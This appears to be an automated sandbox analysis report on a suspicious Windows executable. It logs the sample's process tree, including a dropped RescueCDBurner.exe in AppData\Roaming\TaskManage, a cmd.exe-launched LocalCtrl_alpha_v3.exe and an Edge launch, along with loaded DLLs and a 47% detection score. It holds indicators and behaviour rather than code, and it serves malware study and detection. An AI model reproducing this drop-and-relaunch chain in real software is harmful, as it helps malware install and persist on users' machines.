Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Command line argument: cabinet.dll	2_2_00B71070
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Command line argument: msi.dll	2_2_00B71070
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Command line argument: version.dll	2_2_00B71070
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Command line argument: wininet.dll	2_2_00B71070
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Command line argument: comres.dll	2_2_00B71070
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Command line argument: clbcatq.dll	2_2_00B71070
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Command line argument: msasn1.dll	2_2_00B71070
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Command line argument: crypt32.dll	2_2_00B71070
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Command line argument: feclient.dll	2_2_00B71070
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Command line argument: cabinet.dll	2_2_00B71070

Source: 24EPV9vjc5.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\cmd.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 24EPV9vjc5.exe

ReversingLabs: Detection: 47%

Source: 24EPV9vjc5.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: 24EPV9vjc5.exe	String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls

Source: C:\Users\user\Desktop\24EPV9vjc5.exe

File read: C:\Users\user\Desktop\24EPV9vjc5.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\24EPV9vjc5.exe "C:\Users\user\Desktop\24EPV9vjc5.exe"
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Process created: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe "C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe" -burn.clean.room="C:\Users\user\Desktop\24EPV9vjc5.exe" -burn.filehandle.attached=532 -burn.filehandle.self=520
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Process created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Process created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe "C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe"
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2028,i,14218575738694767663,17851418159564160666,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2004,i,2358623161053230847,14197786204813222314,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6892 --field-trial-handle=2004,i,2358623161053230847,14197786204813222314,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7060 --field-trial-handle=2004,i,2358623161053230847,14197786204813222314,262144 /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7036 --field-trial-handle=2004,i,2358623161053230847,14197786204813222314,262144 /prefetch:8
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Process created: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe "C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe" -burn.clean.room="C:\Users\user\Desktop\24EPV9vjc5.exe" -burn.filehandle.attached=532 -burn.filehandle.self=520	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Process created: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Process created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=2028,i,14218575738694767663,17851418159564160666,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2004,i,2358623161053230847,14197786204813222314,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6892 --field-trial-handle=2004,i,2358623161053230847,14197786204813222314,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7060 --field-trial-handle=2004,i,2358623161053230847,14197786204813222314,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7036 --field-trial-handle=2004,i,2358623161053230847,14197786204813222314,262144 /prefetch:8

Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\24EPV9vjc5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: feclient.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: qtgui4.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: qtnetwork4.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: qtxml4.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: starburn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtcore4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtgui4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtnetwork4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: qtxml4.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcp100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe	Section loaded: webio.dll	Jump to behavior
